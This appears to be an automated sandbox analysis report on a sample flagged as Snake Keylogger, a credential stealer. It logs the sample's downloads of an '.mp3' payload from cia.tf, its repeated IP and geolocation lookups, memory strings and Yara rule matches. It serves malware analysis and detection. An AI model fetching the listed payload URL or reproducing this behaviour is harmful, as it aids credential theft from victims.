                      Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49792 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: cia.tf
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000143F000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000311D000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3323711601.00000000061E2000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2518739694.0000000006BD2000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3324129689.0000000006720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: ishon.exe, 00000007.00000002.3324129689.0000000006720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000143F000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000143F000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003002000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000306C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf
                      Source: ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HI.
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HIC
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.000000000446B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.5:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.5:49746 version: TLS 1.2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
